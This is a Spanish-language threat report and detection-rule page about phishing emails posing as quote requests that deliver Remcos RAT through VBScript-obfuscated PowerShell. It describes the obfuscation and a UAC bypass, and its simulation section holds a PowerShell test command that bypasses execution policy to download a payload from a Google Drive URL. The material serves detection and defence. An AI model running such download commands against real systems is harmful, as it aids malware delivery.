SOC Prime Bias: High

05 Oct 2026 16:41 UTC

Correos Electrónicos de Solicitud de Cotización Falsos Utilizados en Ataques de Phishing con Malware

Author Photo
SOC Prime Team linkedin icon Seguir
Correos Electrónicos de Solicitud de Cotización Falsos Utilizados en Ataques de Phishing con Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los actores de amenazas están distribuyendo correos electrónicos de phishing disfrazados como solicitudes de cotización de proyectos para entregar cargas maliciosas. La campaña utiliza VBScript para ocultar comandos de PowerShell, que en última instancia recuperan una carga útil de múltiples etapas y Remcos RAT. El malware final soporta la ejecución remota de comandos, registro de teclas y exfiltración de datos de sistemas comprometidos.

Investigación

El Centro de Inteligencia de Seguridad de AhnLab (ASEC) identificó una campaña de phishing en la que archivos comprimidos contienen VBScripts ocultos. Los investigadores descubrieron un método de ofuscación que abusa de notepad.exe para reconstruir el nombre ejecutable ‘powershell’ y depende de la sustitución de cadenas mediante tokens para los comandos de PowerShell. La carga útil de múltiples etapas también utiliza objetos COM para realizar la omisión de UAC.

Mitigación

Los usuarios deben validar el dominio del correo electrónico del remitente y tener cautela al abrir archivos adjuntos o hipervínculos inesperados. Las organizaciones deben configurar el filtrado de correos electrónicos para bloquear extensiones de archivos sospechosas como .vbs, .exe y .js. Los usuarios también deben evitar ingresar credenciales sensibles en URLs no oficiales o sospechosas recibidas a través de correos electrónicos no solicitados.

Respuesta

Cuando se detecta actividad maliciosa, verifique la legitimidad del correo electrónico original e investigue la actividad de archivos sospechosos dentro de %APPDATA%. Compruebe la ejecución no autorizada de PowerShell y los indicadores asociados con Remcos RAT. Aísle los sistemas comprometidos de la red para prevenir comunicación C2 adicional, actividad lateral y posible exfiltración de datos.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

LOLBAS WScript / CScript (via process_creation)

Equipo de SOC Prime
01 Oct 2026

Posible Infiltración / Exfiltración de Datos / C2 mediante Servicios / Herramientas de Terceros (via dns_query)

Equipo de SOC Prime
01 Oct 2026

Posible Infiltración / Exfiltración de Datos / C2 mediante Servicios / Herramientas de Terceros (via dns)

Equipo de SOC Prime
01 Oct 2026

IOCs (HashMd5) para detectar: Malware de Phishing/Estafa: Cuidado con los correos electrónicos de phishing disfrazados como solicitudes de cotización

Reglas de IA de SOC Prime
01 Oct 2026

IOCs (SourceIP) para detectar: Malware de Phishing/Estafa: Cuidado con los correos electrónicos de phishing disfrazados como solicitudes de cotización

Reglas de IA de SOC Prime
01 Oct 2026

IOCs (DestinationIP) para detectar: Malware de Phishing/Estafa: Cuidado con los correos electrónicos de phishing disfrazados como solicitudes de cotización

Reglas de IA de SOC Prime
01 Oct 2026

Detectar Script de PowerShell Conectando al Servidor C2 [Conexión de Red de Windows]

Reglas de IA de SOC Prime
01 Oct 2026

Ejecución Maliciosa de PowerShell a través de Ofuscación de VBScript [Windows Powershell]

Reglas de IA de SOC Prime
01 Oct 2026

Ejecución de Simulación

  • Narrativa del Ataque & Comandos: Un atacante envía un correo electrónico de spearphishing que contiene un enlace a un documento. Cuando el usuario hace clic en el enlace, ejecuta un comando oculto de PowerShell diseñado para extraer un script malicioso de un repositorio de Google Drive. El atacante utiliza el parámetro export=download para asegurar que el archivo se descargue directamente en lugar de ser visto en un navegador. El objetivo es ejecutar una carga útil sin archivos en memoria para evadir antivirus basados en disco. El comando está construido para activar la regla de detección específica que apunta a este patrón de descarga.

  • Script de Prueba de Regresión:

    # Simulación de PowerShell descargando un archivo desde Google Drive vía patrón de URL específico
    $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J"
    Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Descargando carga útil...'; $data = Invoke-WebRequest -Uri '$targetUrl';`""
  • Comandos de Limpieza:

    # No se escriben archivos en el disco en esta simulación específica, 
    # pero detenemos el proceso si todavía está en ejecución.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue